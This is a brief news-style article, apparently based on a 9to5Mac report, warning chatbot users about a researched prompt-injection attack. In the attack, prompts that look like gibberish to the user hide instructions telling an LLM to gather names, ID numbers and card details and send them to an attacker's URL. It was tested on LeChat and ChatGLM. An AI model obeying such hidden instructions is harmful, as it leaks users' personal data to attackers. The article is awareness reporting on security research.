Caution: Security Risks of Sharing Personal Details in AI Chats
In today's digital age, safeguarding personal information has become more crucial than ever, especially when interacting with AI chatbots. Although it has always been advised to avoid sharing personal details within AI platforms, a new security threat has surfaced that makes it even more imperative to heed this warning.
Recently, security researchers have uncovered a technique that enables malicious actors to exploit AI chat conversations to harvest users' personal data. These attackers can trick users into executing hidden commands under the guise of a helpful interaction, like aiding in writing a job application cover letter. Behind the scenes, however, lies a hidden directive that the user never sees.
The Emerging Threat
Researchers from the University of California, San Diego, and Nanyang Technological University in Singapore have identified a sophisticated method where a Large Language Model (LLM) can be secretly instructed to extract sensitive information such as names, identification numbers, payment card information, and more from user inputs. This extracted data is then sent directly to malicious servers.
A typical user sees only a benign prompt, while the chatbot receives a coded message that instructs it to compile all gathered data and append it to a predetermined string linked to an unauthorized web address. Such an attack method disguises these malicious instructions as incomprehensible text to the user, effectively masking its true purpose while exploiting the AI's capabilities.
Vulnerabilities in Action
This attack has been tested on two LLMs: LeChat by Mistral AI and ChatGLM developed in China. Although Mistral AI has since patched the vulnerability, the growing prevalence of AI agents taking autonomous actions raises concerns about future attacks and the potential for users to inadvertently allow these agents more access to personal information.
Dan McInerney, a lead researcher in security, highlights the increased risk as LLMs become more integrated into daily applications, warning that the greater the authority these systems have, the higher the likelihood of them becoming target points for exploitation.
This discovery underscores the importance of exercising extreme caution and awareness when engaging in chats facilitated by AI technologies.
For more details on this evolving security issue, check the original piece from 9to5Mac.